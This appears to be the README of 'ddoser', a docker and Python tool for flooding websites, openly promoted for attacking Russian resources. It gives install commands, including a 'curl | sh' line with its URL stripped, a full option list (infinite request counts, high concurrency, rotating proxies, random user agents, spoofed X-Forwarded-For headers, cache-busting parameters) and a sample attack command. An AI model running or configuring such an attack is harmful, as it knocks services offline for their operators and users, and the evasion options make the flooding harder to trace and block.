Small application for ddos attack, was developed special for kill russian's resources :)
If you have a questions or any proposal/bug thern pls contact us ddoser telegram group
Install docker
# with default urls and proxies
docker run --pull always --ulimit nofile=100000:100000 -it imsamurai/ddoser
# with custom params
docker run --pull always --ulimit nofile=100000:100000 -it imsamurai/ddoser --target-urls-file sime.txt ... (check usage section)
# help
docker run --pull always --ulimit nofile=100000:100000 -it imsamurai/ddoser --help
Each run will update ddoser inside.
sudo apt-get update && sudo apt-get install -y git && \
git clone && cd ddoser && ./
Download and install python3.7-3.9 form here if you don't have it or install by brew
brew install python@3.9
brew link python@3.9
git clone
cd ddoser/
pip install -r requirements.txt
Also you can install in Linux by command:
curl | sh
Usage: [OPTIONS]
Run ddoser
--target-url TEXT ddos target url
--target-urls-file TEXT path or url to file contains urls to ddos
--proxy-url TEXT url to proxy resourse
--proxy-file TEXT path to file with proxy list
--concurrency INTEGER concurrency level
--count INTEGER requests count (0 for infinite)
--timeout INTEGER requests timeout
-v, --verbose Show verbose log
--ignore-response do not wait for response body
--with-random-get-param add random get argument to prevent cache usage
--user-agent TEXT [OPTIONAL] custom user agent. If skipped - random UA string will be generated for each request.
--log-to-stdout log to console
--restart-period INTEGER period in seconds to restart application (reload proxies ans targets)
--random-xff-ip set random ip address value for X-Forwarder-For header
--custom-headers TEXT set custom headers as json
--stop-attack INTEGER stop the attack when the target is down after N tries
--shuffle-proxy Shuffle proxy list on application start
-H, --header <TEXT TEXT>... custom header
--proxy-custom-format TEXT custom proxy format like "{protocol}://{ip}:{port} {login}:{password}"
(ip and port is required, protocol can be set by --protocol)
--help Show this message and exit.
proxy-file or proxy-url should contain proxy list in format like:
ip3:port3#sock4 login:password
ip4:port4#http login:password
ip5:port5#http login:password
ip6:port6#https login:password
python3 ./ --concurrency 150 --timeout 60 --with-random-get-param --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" --count 0 --log-to-stdout --target-urls-file --proxy-url '' --restart-period 600 --random-xff-ip
ddoser supports SOCKS4/5 and HTTP(s) proxies with or without authorization, also can start it directly without proxy
Use --restart-period parameter to periodically reloading targets and proxies list
If you see an error too many open files
then you can decrease concurrency/targets count but first of all
try to increase the limits:
ulimit -n 100000
sudo prlimit --nofile=$mylimit --pid $$; ulimit -n $mylimit